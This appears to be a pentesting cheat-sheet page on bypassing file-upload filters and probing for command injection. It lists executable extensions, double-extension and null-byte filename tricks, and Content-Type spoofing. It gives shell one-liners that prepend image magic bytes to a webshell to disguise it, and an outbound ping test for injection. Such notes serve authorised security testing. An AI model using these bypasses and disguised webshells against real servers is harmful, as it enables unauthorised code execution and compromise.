User Endpoints
File Upload Filtering
Executable extensions
.php
-> Standard extension for PHP scripts.
.php5
-> Used for PHP version 5 scripts.
.phtml
-> PHP scripts with an alternative extension, often for compatibility or aesthetic reasons.
.pht
-> Less common extension, used for PHP files; sometimes bypasses naive filters.
.phps
-> Typically used for PHP source code highlighting.
.php3
-> Extension for older PHP 3 scripts; still valid in some configurations.
.asp
-> Active Server Pages, Microsoft’s server-side scripting technology.
.aspx
-> Advanced ASP.NET pages used for dynamic web content on Microsoft platforms.
.jsp
-> Java Server Pages, used for dynamic web applications in Java environments.
Test filters
There are normally three ways a web server will check for valid file types by comparing them to an allow- or deny-list:
File extension
:Double extensions:
.png.php
,.jpg.php
,.png.asp
,.gif.jsp
Null byte injection:
file.php%00.jpg
,file.asp%00.png
Content-Type
headers:Executable types:
application/x-php
application/x-sh
application/x-msdownload
application/x-python-code
Image Types:
image/png
,image/jpeg
,image/gif
,image/bmp
,image/svg+xml
MIME
Confusion:text/html
instead ofapplication/json
text/plain
to trick servers.
Magic bytes
(file signature)Online hex editor ->
HexED.it
echo "89504e470d0a1a0a" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.png
echo "ffd8ff" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.jpg
echo "47494638" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.gif
echo "25504446" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.pdf
echo "504b0304" | xxd -r -p > magic_bytes.bin; cat magic_bytes.bin webshell.php > malicious.zip
Check Input Sanitation/Validation
Submit especial characters in the request ->
!@$%^&
In Linux IP addresses can be written in
decimal
andHEX
, this can be useful ifdots
are blacklisted.
Prove the Injection
If you find a command injection, test whether the system can establish outbound connections to an external server:
ping+10.10.10.10
And wait for it with
tcpdump
:
tcpdump -i tun0 icmp
Last updated